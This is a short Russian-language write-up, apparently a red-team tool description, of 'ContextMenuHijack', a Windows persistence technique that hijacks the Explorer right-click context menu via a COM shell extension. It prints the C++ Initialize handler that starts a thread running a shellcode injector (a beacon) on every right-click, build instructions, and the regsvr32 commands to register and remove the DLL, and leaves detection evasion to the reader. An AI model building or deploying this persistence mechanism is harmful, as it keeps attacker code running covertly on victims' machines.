
Выполнение полезной нагрузки при каждом щелчке правой кнопкой мыши по файлу/папке в контекстном меню проводника для закрепления в системе
Эта оригинальная идея, вдохновившая меня, принадлежит @NinjaParanoid :
ContextMenuHijack — это простая техника персистентности, использующая COM-хайджинг, основанный на поведении человека: когда вы щёлкаете правой кнопкой мыши по файлу или папке в Проводнике, чтобы открыть контекстное меню, в тот же момент выполняется указанный нами beacon.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Вам нужно всего лишь загрузить файл решения (.sln) и собрать его. Важно знать, что для использования этой техники персистентности требуются права администратора. После того как вы всё это сделаете, достаточно зарегистрировать DLL-файл в реестре с помощью regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
если вы хотите удалить его, просто используйте флаг
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe; вам решать, как использовать собственные приёмы обхода обнаружения
